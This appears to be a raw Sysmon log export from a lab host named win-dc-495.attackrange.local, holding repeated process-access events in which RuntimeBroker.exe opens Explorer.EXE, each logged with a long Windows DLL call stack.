13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+103f88|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+103f88|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+103f88|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+103f65|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+103f65|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+103f65|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+103f65|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+106730|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+106730|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+106730|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459 10341000x800000000000000013123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+106730|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000013122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+10a34f|C:\Windows\System32\Windows.Storage.dll+10768d|C:\Windows\System32\Windows.Storage.dll+10847d|C:\Windows\System32\Windows.Storage.dll+1065fa|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+10a34f|C:\Windows\System32\Windows.Storage.dll+10768d|C:\Windows\System32\Windows.Storage.dll+10847d|C:\Windows\System32\Windows.Storage.dll+1065fa|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+10a34f|C:\Windows\System32\Windows.Storage.dll+10768d|C:\Windows\System32\Windows.Storage.dll+10847d|C:\Windows\System32\Windows.Storage.dll+1065fa|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+10a34f|C:\Windows\System32\Windows.Storage.dll+10768d|C:\Windows\System32\Windows.Storage.dll+10847d|C:\Windows\System32\Windows.Storage.dll+1065fa|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+10a9a2|C:\Windows\System32\Windows.Storage.dll+10a32b|C:\Windows\System32\Windows.Storage.dll+10768d|C:\Windows\System32\Windows.Storage.dll+10847d|C:\Windows\System32\Windows.Storage.dll+1065fa|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000013117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+10a9a2|C:\Windows\System32\Windows.Storage.dll+10a32b|C:\Windows\System32\Windows.Storage.dll+10768d|C:\Windows\System32\Windows.Storage.dll+10847d|C:\Windows\System32\Windows.Storage.dll+1065fa|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000013116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+10a9a2|C:\Windows\System32\Windows.Storage.dll+10a32b|C:\Windows\System32\Windows.Storage.dll+10768d|C:\Windows\System32\Windows.Storage.dll+10847d|C:\Windows\System32\Windows.Storage.dll+1065fa|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700 10341000x800000000000000013115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+10a9a2|C:\Windows\System32\Windows.Storage.dll+10a32b|C:\Windows\System32\Windows.Storage.dll+10768d|C:\Windows\System32\Windows.Storage.dll+10847d|C:\Windows\System32\Windows.Storage.dll+1065fa|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 